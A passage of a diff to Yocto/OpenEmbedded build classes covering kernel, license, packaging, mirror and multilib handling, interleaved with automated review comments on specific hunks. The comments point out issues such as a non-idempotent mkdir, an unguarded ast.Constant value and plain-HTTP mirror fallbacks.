327 export KBUILD_BUILD_TIMESTAMP="$ts"
328 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
310 fi 329 fi
311 # The $use_alternate_initrd is only set from 330 # The $use_alternate_initrd is only set from
312 # do_bundle_initramfs() This variable is specifically for the 331 # do_bundle_initramfs() This variable is specifically for the
@@ -325,12 +344,17 @@ kernel_do_compile() {
325 for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do 344 for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
326 oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd 345 oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
327 done 346 done
347}
348
349kernel_do_transform_kernel() {
328 # vmlinux.gz is not built by kernel 350 # vmlinux.gz is not built by kernel
329 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then 351 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
330 mkdir -p "${KERNEL_OUTPUT_DIR}" 352 mkdir -p "${KERNEL_OUTPUT_DIR}"
331 gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz" 353 gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
332 fi 354 fi
333} 355}
356do_transform_kernel[dirs] = "${B}"
357addtask transform_kernel after do_compile before do_install
334 358
335do_compile_kernelmodules() { 359do_compile_kernelmodules() {
336 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE 360 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -348,6 +372,10 @@ do_compile_kernelmodules() {
348 export KBUILD_BUILD_TIMESTAMP="$ts" 372 export KBUILD_BUILD_TIMESTAMP="$ts"
349 export KCONFIG_NOTIMESTAMP=1 373 export KCONFIG_NOTIMESTAMP=1
350 bbnote "KBUILD_BUILD_TIMESTAMP: $ts" 374 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
375 else
376 ts=`LC_ALL=C date`
377 export KBUILD_BUILD_TIMESTAMP="$ts"
378 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
351 fi 379 fi
352 if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then 380 if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
353 cc_extra=$(get_cc_option) 381 cc_extra=$(get_cc_option)
@@ -377,8 +405,8 @@ kernel_do_install() {
377 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE 405 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
378 if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then 406 if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
379 oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install 407 oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
380 rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build" 408 rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
381 rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source" 409 rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
382 # If the kernel/ directory is empty remove it to prevent QA issues 410 # If the kernel/ directory is empty remove it to prevent QA issues
383 rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel" 411 rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
384 else 412 else
@@ -390,12 +418,26 @@ kernel_do_install() {
390 # 418 #
391 install -d ${D}/${KERNEL_IMAGEDEST} 419 install -d ${D}/${KERNEL_IMAGEDEST}
392 install -d ${D}/boot 420 install -d ${D}/boot
421
422 #
423 # When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
424 # by do_assemble_fitimage_initramfs.
425 # This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
426 # So, at the level of the install task we should not try to install the fitImage. fitImage is still not
427 # generated yet.
428 # After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
429 # the deploy folder.
430 #
431
393 for imageType in ${KERNEL_IMAGETYPES} ; do 432 for imageType in ${KERNEL_IMAGETYPES} ; do
394 install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION} 433 if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
395 if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then 434 install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
396 ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType} 435 if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
436 ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
437 fi
397 fi 438 fi
398 done 439 done
440
399 install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION} 441 install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
400 install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION} 442 install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
401 install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION} 443 install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
@@ -403,7 +445,6 @@ kernel_do_install() {
403 install -d ${D}${sysconfdir}/modules-load.d 445 install -d ${D}${sysconfdir}/modules-load.d
404 install -d ${D}${sysconfdir}/modprobe.d 446 install -d ${D}${sysconfdir}/modprobe.d
405} 447}
406do_install[prefuncs] += "package_get_auto_pr"
407 448
408# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile 449# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
409do_kernel_version_sanity_check() { 450do_kernel_version_sanity_check() {
@@ -569,11 +610,11 @@ do_savedefconfig() {
569do_savedefconfig[nostamp] = "1" 610do_savedefconfig[nostamp] = "1"
570addtask savedefconfig after do_configure 611addtask savedefconfig after do_configure
571 612
572inherit cml1 613inherit cml1 pkgconfig
573 614
574KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'" 615KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
575 616
576EXPORT_FUNCTIONS do_compile do_install do_configure 617EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
577 618
578# kernel-base becomes kernel-${KERNEL_VERSION} 619# kernel-base becomes kernel-${KERNEL_VERSION}
579# kernel-image becomes kernel-image-${KERNEL_VERSION} 620# kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -679,7 +720,7 @@ do_sizecheck() {
679 at_least_one_fits= 720 at_least_one_fits=
680 for imageType in ${KERNEL_IMAGETYPES} ; do 721 for imageType in ${KERNEL_IMAGETYPES} ; do
681 size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'` 722 size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
682 if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then 723 if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
683 bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device." 724 bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
684 else 725 else
685 at_least_one_fits=y 726 at_least_one_fits=y
@@ -718,7 +759,7 @@ kernel_do_deploy() {
718 fi 759 fi
719 760
720 if [ ! -z "${INITRAMFS_IMAGE}" -a x"${INITRAMFS_IMAGE_BUNDLE}" = x1 ]; then 761 if [ ! -z "${INITRAMFS_IMAGE}" -a x"${INITRAMFS_IMAGE_BUNDLE}" = x1 ]; then
721 for imageType in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do 762 for imageType in ${KERNEL_IMAGETYPES} ; do
722 if [ "$imageType" = "fitImage" ] ; then 763 if [ "$imageType" = "fitImage" ] ; then
723 continue 764 continue
724 fi 765 fi
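--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
 OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
 
 locale_base_postinst_ontarget() {
+mkdir ${libdir}/locale
 localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
 }
 
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
  m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
  m.write("\t" + makerecipe + "\n\n")
  d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
- d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)")
+ d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
  bb.note("Executing binary locale generation makefile")
  bb.build.exec_func("oe_runmake", d)
  bb.note("collecting binary locales from locale tree")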
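Review bot: The `mkdir ${libdir}/locale` added at new line 48 in locale_base_postinst_ontarget returns a non-zero status when the directory already exists, for example when the postinst runs for a second locale package or is run again. If the generated postinst is executed with errexit (not visible in this hunk), that would stop it before localedef runs. `mkdir -p ${libdir}/locale` creates the directory only when needed and is safe to repeat.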
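--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,8 +31,8 @@ python do_populate_lic() {
  f.write("%s: %s\n" % (key, info[key]))
 }
 
-PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '')).split())}"
-# it would be better to copy them in do_install_append, but find_license_filesa is python
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
+# it would be better to copy them in do_install:append, but find_license_filesa is python
 python perform_packagecopy_prepend () {
  enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
  if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -91,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
  os.link(src, dst)
  except OSError as err:
  if err.errno == errno.EXDEV:
- # Copy license files if hard-link is not possible even if st_dev is the
+ # Copy license files if hardlink is not possible even if st_dev is the
  # same on source and destination (docker container with device-mapper?)
  canlink = False
  else:
  raise
- # Only chown if we did hardling, and, we're running under pseudo
+ # Only chown if we did hardlink and we're running under pseudo
  if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
  os.chown(dst,0,0)
  if not canlink:
- begin_idx = int(beginline)-1 if beginline is not None else None
- end_idx = int(endline) if endline is not None else None
+ begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
+ end_idx = max(0, int(endline)) if endline is not None else None
  if begin_idx is None and end_idx is None:
  shutil.copyfile(src, dst)
  else:
@@ -153,6 +153,10 @@ def find_license_files(d):
  find_license(node.s.replace("+", "").replace("*", ""))
  self.generic_visit(node)
 
+ def visit_Constant(self, node):
+ find_license(node.value.replace("+", "").replace("*", ""))
+ self.generic_visit(node)
+
  def find_license(license_type):
  try:
  bb.utils.mkdirhier(gen_lic_dest)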
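Review bot: visit_Constant at new lines 156-158 calls `node.value.replace(...)` without checking the value's type, although ast.Constant nodes also carry numbers, bytes and None. A LICENSE expression that parses to a non-string constant would then raise AttributeError inside the visitor rather than a license-specific error. Guarding the call with `if isinstance(node.value, str):` keeps the visitor to string constants. The visitor class and find_license_files begin outside this hunk, so how the expression is built is inferred. Separately, the `d.getVar('COREBASE')` added to PSEUDO_IGNORE_PATHS lacks the `or ''` fallback that the two getVar calls next to it have.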
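--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
+ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
+
 python write_package_manifest() {
  # Get list of installed packages
  license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
 
  pkgs = image_list_installed_packages(d)
  output = format_pkg_list(pkgs)
- open(os.path.join(license_image_dir, 'package.manifest'),
- 'w+').write(output)
+ with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
+ package_manifest.write(output)
 }
 
 python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
  copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
  copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
  if rootfs and copy_lic_manifest == "1":
- rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'),
- 'usr', 'share', 'common-licenses')
+ rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
  bb.utils.mkdirhier(rootfs_license_dir)
  rootfs_license_manifest = os.path.join(rootfs_license_dir,
  os.path.split(license_manifest)[1])
@@ -144,12 +145,13 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
  continue
 
  # Make sure we use only canonical name for the license file
- rootfs_license = os.path.join(rootfs_license_dir, "generic_%s" % generic_lic)
+ generic_lic_file = "generic_%s" % generic_lic
+ rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
  if not os.path.exists(rootfs_license):
  oe.path.copyhardlink(pkg_license, rootfs_license)
 
  if not os.path.exists(pkg_rootfs_license):
- os.symlink(os.path.join('..', lic), pkg_rootfs_license)
+ os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
  else:
  if (oe.license.license_ok(canonical_license(d,
  lic), bad_licenses) == False or
@@ -209,7 +211,7 @@ def get_deployed_dependencies(d):
  deploy = {}
  # Get all the dependencies for the current task (rootfs).
  taskdata = d.getVar("BB_TASKDEPDATA", False)
- pn = d.getVar("PN", True)
+ pn = d.getVar("PN")
  depends = list(set([dep[0] for dep
  in list(taskdata.values())
  if not dep[0].endswith("-native") and not dep[0] == pn]))
@@ -256,3 +258,13 @@ python do_populate_lic_deploy() {
 addtask populate_lic_deploy before do_build after do_image_complete
 do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
 
+python license_qa_dead_symlink() {
+ import os
+
+ for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
+ for file in files:
+ full_path = root + "/" + file
+ if os.path.islink(full_path) and not os.path.exists(full_path):
+ bb.error("broken symlink: " + full_path)
+}
+IMAGE_QA_COMMANDS += "license_qa_dead_symlink"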
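Review bot: license_qa_dead_symlink (new lines 261-269) reports only the link path, so whoever reads the log still has to find out where the link pointed; including the target makes the failure actionable: `bb.error("broken symlink: %s -> %s" % (full_path, os.readlink(full_path)))`. Building the path with `os.path.join(root, file)` instead of `root + "/" + file` would match the os.path.join calls used elsewhere in this file. A short comment saying that the check covers the `..`-relative links created in write_license_files would tie it to the symlink target corrected in the hunk at old line 144.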
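--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
+
+python __anonymous () {
+ if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
+ # copy part codes from kernel.bbclass
+ kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
+
+ # set an empty package of kernel-devicetree
+ d.appendVar('PACKAGES', ' %s-devicetree' % kname)
+ d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
+
+ # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
+ type = d.getVar('KERNEL_IMAGETYPE') or ""
+ alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
+ types = d.getVar('KERNEL_IMAGETYPES') or ""
+ if type not in types.split():
+ types = (type + ' ' + types).strip()
+ if alttype not in types.split():
+ types = (alttype + ' ' + types).strip()
+
+ # set empty packages of kernel-image-*
+ for type in types.split():
+ typelower = type.lower()
+ d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
+ d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
+}
+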
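Review bot: The local name `type` at new lines 12 and 21 shadows the Python builtin and is then rebound as the loop variable, which makes the merge logic harder to follow; `imgtype` (with `for imgtype in types.split():`) reads more clearly. The comment at new line 4 says the code is copied from kernel.bbclass without saying which part, so the two copies can drift apart unnoticed. Naming the section it mirrors, for example `# mirrors the KERNEL_IMAGETYPES merge in kernel.bbclass; keep in sync`, would help the next maintainer.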
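--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,8 +1,3 @@
-METADATA_BRANCH ?= "${@base_detect_branch(d)}"
-METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
-METADATA_REVISION ?= "${@base_detect_revision(d)}"
-METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
-
 def base_detect_revision(d):
  path = base_get_scmbasepath(d)
  return base_get_metadata_git_revision(path, d)
@@ -42,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
  except bb.process.ExecutionError:
  rev = '<unknown>'
  return rev.strip()
+
+METADATA_BRANCH := "${@base_detect_branch(d)}"
+METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
+METADATA_REVISION := "${@base_detect_revision(d)}"
+METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"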
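Review bot: Switching METADATA_BRANCH and METADATA_REVISION from `?=` to `:=` (new lines 41 and 43) makes this class overwrite any value assigned before it is parsed, where the old weak assignment kept it. A configuration that pinned these values, for example to record a fixed revision in the build metadata, is now silently replaced by whatever the detection functions return. If that is intended, a comment above the assignments would document it, e.g. `# Expanded once at parse time; earlier assignments are deliberately overridden`. The move below the function definitions is presumably needed because `:=` evaluates them immediately.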
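--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
 ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
 ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
 ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
-http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
 http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
 http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
 ${APACHE_MIRROR} http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
 cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
+gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
@@ -53,6 +53,7 @@ npm://.*/?.* http://downloads.yoctoproject.org/mirror/sources/ \n \
 cvs://.*/.* http://sources.openembedded.org/ \n \
 svn://.*/.* http://sources.openembedded.org/ \n \
 git://.*/.* http://sources.openembedded.org/ \n \
+gitsm://.*/.* http://sources.openembedded.org/ \n \
 hg://.*/.* http://sources.openembedded.org/ \n \
 bzr://.*/.* http://sources.openembedded.org/ \n \
 p4://.*/.* http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
 npm://.*/?.* http://sources.openembedded.org/ \n \
 ${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
 ${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
 "
 
 # Use MIRRORS to provide git repo fallbacks using the https protocol, for cases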
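Review bot: The two `gitsm://.*/.*` fallbacks added at new lines 45 and 56 point at `http://` URLs, while the mirrors.kernel.org entries added at new lines 66-67 of the same commit use `https://`. Over plain HTTP the fetched archive can be altered in transit, so its integrity then rests entirely on whatever revision or checksum verification the fetcher applies afterwards. Unless these hosts cannot serve TLS, `gitsm://.*/.* https://downloads.yoctoproject.org/mirror/sources/ \n \` would be the safer form. The neighbouring git, svn and hg lines have the same property but are not touched by this commit.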
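--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
  e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
  e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
  e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
+ e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
  e.data.setVar("MLPREFIX", variant + "-")
  override = ":virtclass-multilib-" + variant
  e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
  d.setVar("LINGUAS_INSTALL", "")
  # FIXME, we need to map this to something, not delete it!
  d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
- bb.build.deltask('do_populate_sdk', d)
  bb.build.deltask('do_populate_sdk_ext', d)
  return
 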
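--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
 USE_NLS = "${SDKUSE_NLS}"
 
 OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
+
+PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"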
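Review bot: `PATH_prepend` at new line 117 puts `${COREBASE}/scripts/nativesdk-intercept` ahead of every other directory, so any executable in it shadows the same-named host or native tool for all tasks of recipes inheriting this class, and nothing here says which tools are meant to be intercepted or why. A comment above the assignment would make the trust placed in that directory explicit, e.g. `# Wrappers in nativesdk-intercept shadow selected tools during nativesdk builds; keep the directory limited to those wrappers`.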
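--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -1140,6 +1140,14 @@ python split_and_strip_files () {
  # Modified the file so clear the cache
  cpath.updatecache(file)
 
+ def strip_pkgd_prefix(f):
+ nonlocal dvar
+
+ if f.startswith(dvar):
+ return f[len(dvar):]
+
+ return f
+
  #
  # First lets process debug splitting
  #
@@ -1153,6 +1161,8 @@ python split_and_strip_files () {
  for file in staticlibs:
  results.append( (file,source_info(file, d)) )
 
+ d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
+
  sources = set()
  for r in results:
  sources.update(r[1])
@@ -1460,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
 python emit_pkgdata() {
  from glob import glob
  import json
+ import gzip
 
  def process_postinst_on_target(pkg, mlprefix):
  pkgval = d.getVar('PKG_%s' % pkg)
@@ -1532,6 +1543,8 @@ fi
  with open(data_file, 'w') as fd:
  fd.write("PACKAGES: %s\n" % packages)
 
+ pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
+
  pn = d.getVar('PN')
  global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
  variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
@@ -1551,17 +1564,32 @@ fi
  pkgval = pkg
  d.setVar('PKG_%s' % pkg, pkg)
 
+ extended_data = {
+ "files_info": {}
+ }
+
  pkgdestpkg = os.path.join(pkgdest, pkg)
  files = {}
+ files_extra = {}
  total_size = 0
  seen = set()
  for f in pkgfiles[pkg]:
- relpth = os.path.relpath(f, pkgdestpkg)
+ fpath = os.sep + os.path.relpath(f, pkgdestpkg)
+
  fstat = os.lstat(f)
- files[os.sep + relpth] = fstat.st_size
+ files[fpath] = fstat.st_size
+
+ extended_data["files_info"].setdefault(fpath, {})
+ extended_data["files_info"][fpath]['size'] = fstat.st_size
+
  if fstat.st_ino not in seen:
  seen.add(fstat.st_ino)
  total_size += fstat.st_size
+
+ if fpath in pkgdebugsource:
+ extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
+ del pkgdebugsource[fpath]
+
  d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
 
  process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1582,6 +1610,10 @@ fi
 
  sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
 
+ subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
+ with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
+ json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
+
  # Symlinks needed for rprovides lookup
  rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
  if rprov:
@@ -1612,7 +1644,8 @@ fi
  write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
 
 }
-emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides"
+emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
+emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
 
 ldconfig_postinst_fragment() {
 if [ x"$D" = "x" ]; then
@@ -1620,7 +1653,7 @@ if [ x"$D" = "x" ]; then
 fi
 }
 
-RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps"
+RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
 
 # Collect perfile run-time dependency metadata
 # Output:
@@ -1989,12 +2022,12 @@ python package_do_pkgconfig () {
  for pkg in packages.split():
  pkgconfig_provided[pkg] = []
  pkgconfig_needed[pkg] = []
- for file in pkgfiles[pkg]:
+ for file in sorted(pkgfiles[pkg]):
  m = pc_re.match(file)
  if m:
  pd = bb.data.init()
  name = m.group(1)
- pkgconfig_provided[pkg].append(name)
+ pkgconfig_provided[pkg].append(os.path.basename(name))
  if not os.access(file, os.R_OK):
  continue
  with open(file, 'r') as f:
@@ -2017,7 +2050,7 @@ python package_do_pkgconfig () {
  pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
  if pkgconfig_provided[pkg] != []:
  with open(pkgs_file, 'w') as f:
- for p in pkgconfig_provided[pkg]:
+ for p in sorted(pkgconfig_provided[pkg]):
  f.write('%s\n' % p)
 
  # Go from least to most specific since the last one found wins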
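--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
 do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
 do_package_write_deb[umask] = "022"
 do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_deb after do_packagedata do_package
-
+EPOCHTASK ??= ""
+addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"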
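Review bot: `EPOCHTASK` is introduced at the `addtask package_write_deb` line with no comment saying what it is for or who sets it, and the same two lines are repeated in package_ipk.bbclass and package_rpm.bbclass. Elsewhere in this commit reproducible_build.bbclass assigns `EPOCHTASK = "do_deploy_source_date_epoch"`, so the `??= ""` default appears to exist only so that `addtask` still expands when that class is not inherited. I would add a comment above the default in all three classes, e.g. `# EPOCHTASK is set by reproducible_build.bbclass; when set, packages are written only after the SOURCE_DATE_EPOCH stamp is deployed`.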
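--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
 do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
 do_package_write_ipk[umask] = "022"
 do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_ipk after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"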
